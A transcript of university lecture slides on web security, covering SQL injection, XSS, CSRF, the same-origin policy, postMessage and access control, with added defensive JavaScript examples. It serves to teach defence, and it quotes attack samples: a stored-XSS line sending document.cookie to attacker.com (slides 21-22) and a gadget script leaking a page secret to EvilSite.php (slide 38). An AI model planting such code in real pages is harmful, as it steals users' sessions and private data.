
Web Programming and Security Lecture 2 Tamara Rezk.



Presentation on theme: "Web Programming and Security Lecture 2 Tamara Rezk."— Presentation transcript:

1 Web Programming and Security Lecture 2 Tamara Rezk

2 Security problems Confidentiality violation Integrity violation Availability violation

3 Attacks, summary Phishing attacks (eg MySpace, 2006)

4 Attacks, summary Phishing attacks (eg MySpace, 2006) Session integrity violation (eg Dansie shopping cart, 2006)

5 Attacks, summary Phishing attacks (eg MySpace, 2006) Session integrity attacks (eg Dansie shopping cart, 2006) Cross site request forgery attacks (eg Gmail, 2007)

6 Prevention
Server side:
– add a secret that the attacker cannot guess
– re-authenticate for critical operations
User side:
– logging off one site before using others

7 Attacks, summary Phishing attacks (eg MySpace, 2006) Session integrity attacks (eg Dansie shopping cart, 2006) Cross site request forgery attacks (eg Gmail, 2007) Navigation policy based attacks (eg Guninski/Citibank, 1999)

8 Attacks, classification? Phishing attacks (eg MySpace, 2006) Session integrity attacks (eg Dansie shopping cart, 2006) Cross site request forgery attacks (eg Gmail, 2007) Navigation policy based attacks (eg Guninski/Citibank, 1999)

9 Lessons Learned
Do not trust the client on:
– maintaining integrity of session state
– running client code
– providing valid input

10 Lessons Learned
Do not trust the client on: providing valid input

import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;

public class Greeting extends HttpServlet {
  public void doGet(HttpServletRequest req, HttpServletResponse res)
      throws ServletException, IOException {
    res.setContentType("text/html");
    PrintWriter out = res.getWriter();
    String name = req.getParameter("name");       // untrusted: comes straight from the client
    out.println("<html>\n<body>\n");
    out.println("Greeting from " + name + "\n");   // echoed into the page without escaping
    out.println("</body>\n</html>\n");
  }
}

11 Lessons Learned Do not trust the client http://host/Greeting?name= …

12 Security in Web Applications
Main source of vulnerabilities (from Cenzic Web Security Trends Report Q1-Q2 2010):
– Cross-site scripting
– Information leakage
– SQL Injection
The multitier nature of web applications causes these problems.

13 Code injection
– Data-tier code injection (SQL)
– Client-tier code injection (Javascript)
– Server-tier code injection

14 SQL Injection
Query = "SELECT score FROM Student where name = '" + input
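Added example (not from the lecture): the concatenated query of this slide transcribed into JavaScript, next to a construction that binds the value as one SQL string literal, plus a small scanner that reports whether the text of the input ended up inside a literal or became part of the query itself. The sample input "O'Brien" is constructed; real code should use the database driver's parameter binding rather than the quoteLiteral helper shown here.

```javascript
// The vulnerable construction from the slide, transcribed into JavaScript.
function buildQueryByConcatenation(input) {
  return "SELECT score FROM Student where name = '" + input;
}

// Quote a value as exactly one SQL string literal. The only character that
// can terminate the literal is the single quote, and standard SQL escapes it
// by doubling. (Illustrative helper; prefer driver-side parameter binding.)
function quoteLiteral(value) {
  return "'" + String(value).replace(/'/g, "''") + "'";
}

// Parameterised construction: the query template is fixed by the programmer;
// client-supplied values are bound into "?" placeholders as quoted literals.
function buildQueryWithPlaceholders(template, params) {
  let i = 0;
  return template.replace(/\?/g, () => {
    if (i >= params.length) throw new Error("not enough parameters");
    return quoteLiteral(params[i++]);
  });
}

// Scanner used to check the result: counts the string literals in a query,
// handling doubled quotes, and collects the text that lies OUTSIDE any
// literal (that text is interpreted as SQL, not as data).
function inspectQuery(sql) {
  let literals = 0, unterminated = false, outside = "";
  let i = 0;
  while (i < sql.length) {
    if (sql[i] === "'") {
      let j = i + 1, closed = false;
      while (j < sql.length) {
        if (sql[j] === "'") {
          if (sql[j + 1] === "'") { j += 2; continue; } // escaped quote inside literal
          closed = true;
          break;
        }
        j++;
      }
      literals++;
      if (!closed) { unterminated = true; break; }
      i = j + 1;
    } else {
      outside += sql[i];
      i++;
    }
  }
  return { literals, unterminated, outside };
}

// Constructed input: an ordinary name containing an apostrophe.
const constructedInput = "O'Brien";
const template = "SELECT score FROM Student where name = ?";
```

With concatenation the apostrophe closes the literal early and "Brien" becomes SQL text; with the placeholder version the whole name stays inside a single literal, which is the property that makes the query's structure independent of its input.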

15 SQL Code Injection Attack, Microsoft 2008

16 CardSystems out of business, 2005 (SQL Code injection attack): 263000 numbers stolen!

17 Dynamic Code Generation
s(i1, …, in) → c
– s: server program
– i1, …, in: untrusted input (provided by client)
– c: client code, an HTML document with Javascript nodes
Let's see a guestbook example.

18 Attack to the guestbook: alert("attack!");

19 Embedding Javascript...
//<![CDATA[
alert("Page is loading");
//]]>
Please do not click on this text....
Ways of embedding: External Javascript File; Inline Code; Event Handler

20 Let’s see some other ways to inject code

21 Code Injection, other example
Untrusted client input: window.location = "http://attacker.com?cookie=" + document.cookie;
Goal: inject the code to a benign user.
Consequence:
– Cookie stolen by attacker.com;
– Possibly sensitive private information.

22 Code Injection & XSS - Example
(Diagram: Database, Guestbook server, Benign user, Malicious user, Attacker.com)
Malicious user – Add entry: window.location = "http://attacker.com?cookie=" + document.cookie;
Benign user – Get all entries: receives window.location = "http://attacker.com?cookie=" + document.cookie;
Result: secret cookies sent to Attacker.com

23 Existing Server-side Prevention
– Escaping / Filtering: vulnerable code → patched code. Programmer attention required!!
  Example: preg_replace("script", "", input)   " " → " "
– Taint Analysis: WebSSARI, Huang et al. [2004]; Pixy, Jovanovic et al. [2006]; Xie and Aiken [2006]; …
– String Analysis: Minamide [2005]; Balzarotti [2008]; Wassermann et al. [2008]; …
– Instruction Randomization (randomized code): Boyd et al. [2004]
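Added example (not from the lecture): the single-keyword filter of this slide next to context-aware escaping, both applied to the "name" parameter of the Greeting servlet from slide 10. The page template is transcribed from that servlet; the sample inputs and the containsActiveMarkup check are constructed for this example.

```javascript
// Filtering approach from the slide, transcribed: delete the word "script".
function filterScript(input) {
  return String(input).replace(/script/g, "");
}

// Escaping approach: every character with meaning in HTML text or in a
// double-quoted attribute is replaced by its entity, so whatever the client
// sent can only be rendered as text, never parsed as markup.
function escapeHtml(input) {
  const entities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(input).replace(/[&<>"']/g, (c) => entities[c]);
}

// Page generation as in the Greeting servlet, with a pluggable sanitiser.
function greetingPage(name, sanitise) {
  return "<html>\n<body>\nGreeting from " + sanitise(name) + "\n</body>\n</html>\n";
}

// Check used on the result: does the client-controlled part of the page
// still contain a tag opener? Any element that survives can carry an event
// handler, which triggers the JS engine just like a script element.
function containsActiveMarkup(html) {
  const userPart = html.slice(html.indexOf("Greeting from"));
  return /<[a-z]/i.test(userPart);
}

// Constructed inputs.
const benignName = "Alice";
const handlerName = "<b onclick=\"alert(1)\">Alice</b>"; // no "script" token at all
const upperName = "<SCRIPT>alert(1)</SCRIPT>";          // different case from the filter
```

The filter leaves the event-handler input untouched and does not even see the upper-case one, while escaping neutralises all three; this is why the slide marks filtering as requiring programmer attention and why later slides treat the problem at the language level instead.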

24 HTML parser and browser quirks
Standard HTML parser:
– obtain the target syntax tree
– no ill-formed result produced
Various ways of triggering the JS engine (BEEP [Jim et al. 2007]):
– event listener: ( :onclick "alert(msg)")
– hyperlink: ( :href "javascript:alert(msg)")
– dynamic code evaluation: eval, document.write
Solution: turning off all these features in Hop – an advantage of a multitier language.
NOT identified by syntax difference.

25 Code Injection Attack vectors

26

27 Web 2.0 Applications
2004: AJAX (Asynchronous Javascript and XML) becomes popular, social sites emerge.
Technologies: Web Browser, Web Server, HTTP, HTML; CGI: Common Gateway Interface; AJAX: Javascript, CSS, XML, DOM, XMLHttpRequest.
Request a service → partial reloading of the webpage (iframe); XMLHttpRequest object for asynchronous communication.

28 Mashups: HousingMaps, 2005

29 Web Mashup
Web application (client side):
– integrating a third-party gadget;
– integrator partially sharing information with the gadget.
Example: Housingmap.com – Google Maps Gadget + Integrator's Housing Data. Great way to use your data!

30 Le Monde is a mashup

31 Code of Le Monde
<iframe src="http://www.youtube.com/embed/W8WP2SjsZw4?rel=0" width="520" height="294" frameborder="0">

32 ALL OR NOTHING TRUST MODEL IN THE BROWSER The Same Origin Policy

33 Programming Model – Dilemma
Full sharing (JS Env.): using the <script> tag, running as integrator, gadget trusted.
Full isolation (by SOP): using a frame, running as gadget.
Limited sharing:
– frame identifier
– postMessage
(Diagram: Google Maps Gadget / Integrator's Housing Data, shared vs. separated)

34 The same origin policy (SOP)
The <script> tag: what about Javascript behaviour? (Diagram: browser, integrator's code … HEAP, global object)

35 The same origin policy (SOP)
The <script> tag permits to treat code as code from the same origin.
integrator's code: <script src=http://b.com/gadget.js> (Diagram: browser, server a.com, server b.com)

36 The same origin policy (SOP)
The <script> tag: what about Javascript behaviour?
integrator's code: <script src=http://b.com/gadget.js> (Diagram: browser)

37 The same origin policy (SOP)

38 An evil gadget
integrator.html: element "secret" containing 42
gadget.js:
secret = document.getElementById("secret").innerHTML;
setTimeout('delayer()', 5000)
delayer = function(){ window.location = "EvilSite.php?secret=" + secret; }

39 Important JavaScript detail: o.f is treated as o["f"] Javascript Thanks Shriram Krishnamurthi for this slide

40 Is this function safe?
lookup = function(o, fd) {
  if (fd === "XHR") {
    return "unsafe!";
  } else {
    return o[fd];
  }
}
If fd is not a string, JavaScript invokes the .toString method to convert the value to a string.

41 badObj = {toString: function () { return "XHR"}}
lookup(window, badObj) → window[badObj] → window[{toString: …}] → window[{toS…: …}.toS…()] → window[(function () …)()] → window["XHR"]
…in fact, lookup is unsafe!
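Added example (not from the lecture): the lookup function of slides 40-41 next to a hardened version, with the global window replaced by a constructed object. It also includes a "half fixed" variant, assumed here for illustration, that coerces fd to a string for the check but then uses the original value for the access, to show that the implicit conversion runs once per use and a toString that changes its answer defeats it.

```javascript
// Stand-in for the global object (constructed).
const fakeWindow = { XHR: "privileged-XHR-factory", title: "page" };

// The slide's version: compares fd to "XHR" before the property access.
function lookupUnsafe(o, fd) {
  if (fd === "XHR") {
    return "unsafe!";
  } else {
    return o[fd];            // if fd is an object, o[fd] calls fd.toString()
  }
}

// Tempting but still wrong (hypothetical variant): toString is invoked for
// the comparison AND again for o[fd], so it may answer differently each time.
function lookupHalfFixed(o, fd) {
  if (String(fd) === "XHR") {
    return "unsafe!";
  }
  return o[fd];
}

// Hardened version: convert exactly once, check the string that will really
// be used as the key, and refuse to reach properties inherited from the
// prototype chain (only the object's own fields are visible).
function lookupSafe(o, fd) {
  const key = String(fd);    // the only point where toString may run
  if (key === "XHR") {
    return "unsafe!";
  }
  if (!Object.prototype.hasOwnProperty.call(o, key)) {
    return undefined;
  }
  return o[key];
}

// The object from slide 41: a toString that lies about the key.
const badObj = { toString: function () { return "XHR"; } };

// A toString whose answer depends on how often it has been called.
function makeFlipper(first, second) {
  let calls = 0;
  return { toString: function () { return calls++ === 0 ? first : second; } };
}
```

Against badObj the slide's function returns the privileged field; against a flipper the half-fixed version passes its check with "title" and then fetches "XHR"; lookupSafe answers "unsafe!" and "page" respectively because it never lets the value be converted twice.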

42 More evals: e.g., setTimeout
function f() { alert('hello'); }
setTimeout(f, 1000);
var s = "alert('hello')";
setTimeout(s, 1000);
Any JavaScript string!

43 Let’s try some more code with setTimeout

44 s = "alert('Lets talk about Javascript!')";
setTimeout(s, 100)

45 function fac(x) { if (x <= 1) { return 1; } return x*fac(x-1); }
r = fac(3);
s = "alert(" + r + ")";
setTimeout(s, 100)

46 What happens now?
function fac(x) { if (x <= 1) { return 1; } return x*fac(x-1); }
r = fac(4);
s = "alert(" + r + ")";
setTimeout(s, 100)

47 Anything Else?
– Wrap DOM nodes and callbacks
– Don't hand references to DOM nodes to the wrong functions
– Avoid other conditionally unsafe calls
– Be aware of implicit method calls in JavaScript's semantics
– Simulate private fields (JavaScript provides none)
– Disallow arbitrary traversal of the object graph
– Avoid leaking the global object
– Make sure all invariants hold over 50+ entry points
Thank you Shriram Krishnamurthi for all the recommendations! Check ADsafety.

48 The same origin policy (SOP)
The <script> tag: what about Javascript behaviour? (Diagram: browser, integrator's code … HEAP, global object)

49 Frame Communication

50 Fragment Identifier Messaging
Send information by navigating a frame:
– http://gadget.com/#hello
Navigating to a fragment doesn't reload the frame:
– no network traffic, but the frame can read its fragment
Not a secure channel:
– Confidentiality
– Integrity
– Authentication

51 An attack to the Elysee?
http://www.elysee.fr/president/accueil.1.html?id=1327062581707&msg=Sotp%20S.O.P.A%20:)%20%E2%99%AB%E2%99%AB
http://www.elysee.fr/president/accueil.1.html?id=1327077505069&msg=Anonymous
http://www.elysee.fr/president/accueil.1.html?id=1327077699951&msg=We%20Are%20Legion!

52 An attack to the Elysee?
http://www.elysee.fr/president/accueil.1.html?id=1327062581707&msg=Sotp%20S.O.P.A%20:)%20%E2%99%AB%E2%99%AB
http://www.elysee.fr/president/accueil.1.html?id=1327077505069&msg=Anonymous
http://www.elysee.fr/president/accueil.1.html?id=1327077699951&msg=We%20Are%20Legion!
Let's see a video.

53 HTML 5 cross-origin client side communications
– postMessage channel between frames
– Child policy

54 postMessage
New API for inter-frame communication; supported in latest betas of many browsers.
Not a secure channel:
– Confidentiality
– Integrity
– Authentication

55 Reply Attack

56 Fix: Improve the API (Stanford)
Let the sender specify the recipient:
– frame[0].postMessage("Hello", "http://gadget.com")
– can omit the argument if confidentiality is not required
Adoption:
– Firefox 3
– Internet Explorer 8
– Safari 3.1
See "Securing Frame Communication in Browsers".

57 Security considerations: postMessage
– Do not configure the target origin to "*": sensitive data can be leaked to unknown widgets
– Always check the sender's origin
– Always validate data before use
– Do not consume data directly with eval() or innerHTML
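Added example (not from the lecture): the recipient check of slide 56 and the receiver-side rules of slide 57, modelled with an in-process stand-in for browser frames so both sides of the exchange can be run offline. The Frame class, the postMessage function that carries an explicit sender origin, and the origins used are all constructed for this example; they are not browser APIs.

```javascript
// A frame holds a document with an origin; navigating it replaces the
// document, so any message handler the old document installed is gone.
class Frame {
  constructor(origin) {
    this.origin = origin;
    this.handler = null;
  }
  navigate(newOrigin) {
    this.origin = newOrigin;
    this.handler = null;
  }
  onMessage(fn) { this.handler = fn; }
}

// Model of target.postMessage(data, targetOrigin): the browser delivers only
// if the target's CURRENT origin matches targetOrigin ("*" matches anything).
// Returns whether the message was delivered.
function postMessage(target, data, targetOrigin, senderOrigin) {
  if (targetOrigin !== "*" && target.origin !== targetOrigin) {
    return false;                       // recipient was navigated elsewhere: dropped
  }
  if (target.handler) target.handler({ data, origin: senderOrigin });
  return true;
}

// Receiver following slide 57: check the origin, validate the shape of the
// data, and only then use it (here: append to a log, never eval/innerHTML).
function installGadgetHandler(frame, trustedOrigin, log) {
  frame.onMessage((event) => {
    if (event.origin !== trustedOrigin) return;                   // unknown sender
    if (typeof event.data !== "object" || event.data === null) return;
    if (typeof event.data.msg !== "string") return;                // wrong shape
    log.push(event.data.msg);
  });
}

function scenario() {
  const integrator = "http://integrator.example";
  const attacker = "http://attacker.example";
  const gadgetLog = [];
  const attackerLog = [];
  const frame = new Frame("http://gadget.com");
  installGadgetHandler(frame, integrator, gadgetLog);

  // 1. Integrator names the recipient; gadget receives it.
  const delivered = postMessage(frame, { msg: "hello" }, "http://gadget.com", integrator);
  // 2. A message from an unknown origin is ignored by the gadget's origin check.
  postMessage(frame, { msg: "evil" }, "http://gadget.com", attacker);
  // 3. Right origin but a bare string: rejected by data validation.
  postMessage(frame, "not-an-object", "http://gadget.com", integrator);

  // 4. The frame is navigated to the attacker's site before the next send.
  frame.navigate(attacker);
  frame.onMessage((event) => attackerLog.push(event.data.msg));
  const leakedWithStar = postMessage(frame, { msg: "secret" }, "*", integrator);
  const leakedWithTarget = postMessage(frame, { msg: "secret" }, "http://gadget.com", integrator);

  return { delivered, leakedWithStar, leakedWithTarget, gadgetLog, attackerLog };
}
```

Step 4 is the point of the API change: with "*" the browser hands the secret to whatever document currently occupies the frame, while naming "http://gadget.com" makes the browser drop the message once the frame no longer has that origin.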

58 Basic definitions of security
Confidential information is stored in, or communicated through, "objects" protected by access rights, typically for reading, writing, and executing.
Confidentiality: to prevent unauthorized disclosure of data we should implement:
– access control
– secure information flow
– adequate cryptography
– secure protocols
(to name a few)

59 Access Control
– "Subjects" = programs (threads) or users, with security clearances (read/write/execute).
– "Objects" = where information is stored. For instance memory locations, files, entries in a database, services, communication channels … with access rights.
– Access control = the operations performed by the "subjects" over the "objects" are checked to have the appropriate clearance.

60 Access Control (for integrity)
A simple example in hop: A Guest Book Application
Objects = "services"
Subjects = "users calling the services" (authentication)
Access Policy = "which user can call which service":
Services                        Users
addentry                        anonymous
addentry, delete-all-entries    admin

61 Access Control (for confidentiality)
A simple example in hop: A Broker Application
Objects = "services" → showStockInfo
Subjects = "users calling the services" (authentication)
Access Policy = "No user should learn anything about stocks of other users" (each user can see only his/her confidential information on stocks)

62 Access control In Hop: wizard.hop

63 AUTHENTICATION PROTOCOLS Http authentication is not really secure!! Let’s play attacker again on an example with “Tamper Data” and a Base64 Decoder to obtain the password of the admin user.

64 SSL/TLS AUTHENTICATION

65 INFORMATION FLOW IN THE PROGRAM

66 Broker Application
(define (isUser t a) (string=? t (car a)))
(define-service (show-all-entry)
  … (map show-entry (filter (lambda (a) (isUser username a)) broker-private-information)))
(define-service (broker)
  ( ( … ( :onclick ~(with-hop ($show-all-entry) …) "Share holder login") …)))

67 Broker Application
(define (isUser1 t a) (string-contains t (car a)))
(define-service (show-all-entry)
  … (map show-entry (filter (lambda (a) (isUser1 username a)) broker-private-information)))
(define-service (broker)
  ( ( … ( :onclick ~(with-hop ($show-all-entry) …) "Share holder login") …)))
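Added example (not from the lecture): the two filters of slides 66 and 67 transcribed from Hop into JavaScript and run over a constructed broker-private-information table, to show how the substring test of isUser1 lets information flow to the wrong user. Bigloo's string-contains is modelled with String.prototype.includes, which has the same truth value (owner is a substring of the logged-in name); the user names and holdings are made up.

```javascript
// Constructed broker-private-information: [owner, stock, shares].
const brokerPrivateInformation = [
  ["alice", "ACME", 120],
  ["bob", "OMEGA", 40],
  ["alicebob", "XYZ", 7],
  ["carol", "ACME", 15],
];

// (define (isUser t a) (string=? t (car a)))
function isUser(username, entry) {
  return username === entry[0];
}

// (define (isUser1 t a) (string-contains t (car a)))
// string-contains returns the index of (car a) inside t, or #f: the test is
// true whenever the entry's owner is a substring of the logged-in name.
function isUser1(username, entry) {
  return username.includes(entry[0]);
}

// The show-all-entry service: filter the private table with the given
// predicate and render each surviving entry as a line.
function showAllEntries(username, predicate) {
  return brokerPrivateInformation
    .filter((entry) => predicate(username, entry))
    .map(([owner, stock, shares]) => owner + ":" + stock + ":" + shares);
}

// Check for the policy of slide 61: every line shown to a user must be the
// user's own entry.
function violatesPolicy(username, predicate) {
  return showAllEntries(username, predicate).some((line) => !line.startsWith(username + ":"));
}
```

A user named "alicebob" sees only the XYZ holding under isUser, but under isUser1 also receives alice's and bob's entries, because both names are substrings of the login name; the access check itself is unchanged, the leak comes from the comparison inside the data filter.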

68 Availability security problems: a service or resource is made unavailable

69 Availability security problems: a service or resource is made unavailable. Common attack: DOS or Distributed DOS (DDOS)

70 Availability security problems: a service or resource is made unavailable. Common attack: DOS or Distributed DOS (DDOS). How to prevent it?

71 Availability security problems

72 Attacks, summary Phishing attacks (eg MySpace, 2006) Session integrity attacks (eg Dansie shopping cart, 2006) Cross site request forgery attacks (eg Gmail, 2007) Navigation policy based attacks (eg Guninski/Citibank, 1999) Code injection attacks (eg Microsoft, 2008) XSS attacks Mashup based attacks http authentication attacks DOS attacks (Captchas)

73 Context – Multi-tier Language
Unified language; code split to different tiers. Examples:
– LINKS [Cooper et al. 2005]
– Swift [Chong et al. 2007]
– Ur [Chlipala 2010]
– HOP [Serrano et al. 2006]
This course's focus: HOP
(Diagram: unified source → multi-tier compiler → server code, client code, data query)

74 Hop compilation
(Diagram: Hop source → server code compiler → server bytecode; Hop source → client code compiler → Hop client code (HTML, CSS, JS); client invokes server over HTTP and accesses URLs; additional components: Code Injection Prevention, Mashic Compiler)

75

